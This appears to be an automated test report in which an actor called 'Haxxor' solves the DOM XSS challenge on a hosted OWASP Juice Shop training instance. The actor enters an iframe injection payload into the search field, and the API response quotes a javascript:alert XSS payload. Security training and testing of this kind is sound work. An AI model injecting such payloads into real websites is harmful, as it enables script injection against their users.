Haxxor can inject a payload into the page

Home > Xss-dom > Juice Shop is susceptible to XSS attacks > Haxxor can inject a payload into the page

Report generated 04-07-2025 12:58

Juice Shop Is Susceptible To XSS Attacks

1 To 10 Seconds (Duration) Juice Shop Is Susceptible To XSS Attacks (feature)

Haxxor can inject a payload into the page

Steps

Screenshots

Outcome

When she searches for '<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>'

SUCCESS

1s 869ms

Haxxor searches for '<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>'

SUCCESS

1s 830ms

Haxxor navigates to "/"

Response

URL: https://stc-owasp-juice-dnebatcgf2ddf4cr.uksouth-01.azurewebsites.net/api/Challenges/?name=DOM%20XSS

Status code: 200

Request Headers

Accept: application/json, text/plain, */*
User-Agent: axios/1.10.0
Accept-Encoding: gzip, compress, deflate, br

Response Headers

content-length: 778
connection: close
content-type: application/json; charset=utf-8
date: Fri, 04 Jul 2025 12:58:42 GMT
access-control-allow-origin: *
etag: W/"30a-n9rzQBknaHTlxRUJC5TUVDFgXoQ"
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
feature-policy: payment 'self'
x-recruiting: /#/jobs

Response Body

{
    "status": "success",
    "data": [
        {
            "id": 19,
            "key": "localXssChallenge",
            "name": "DOM XSS",
            "category": "XSS",
            "tags": "Tutorial,Good for Demos,With Coding Challenge",
            "description": "Perform a <i>DOM</i> XSS attack with <code>&lt;iframe src=\"javascript:alert(`xss`)\"&gt;</code>.",
            "difficulty": 1,
            "hint": "Look for an input field where its content appears in the HTML when its form is submitted.",
            "hintUrl": "https://pwning.owasp-juice.shop/companion-guide/latest/part2/xss.html#_perform_a_dom_xss_attack",
            "mitigationUrl": "https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html",
            "solved": true,
            "disabledEnv": null,
            "tutorialOrder": 2,
            "codingChallengeStatus": 0,
            "hasCodingChallenge": true,
            "createdAt": "2025-06-30T07:25:07.854Z",
            "updatedAt": "2025-07-01T12:48:15.855Z"
        }
    ]
}

SUCCESS

727ms

Haxxor ensures that true does equal true

SUCCESS

001ms

Haxxor waits until Search button does become visible

SUCCESS

041ms

Haxxor clicks on Search button

SUCCESS

078ms

Haxxor waits until Search input does become visible

SUCCESS

025ms

Haxxor enters "'<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>'" into Search input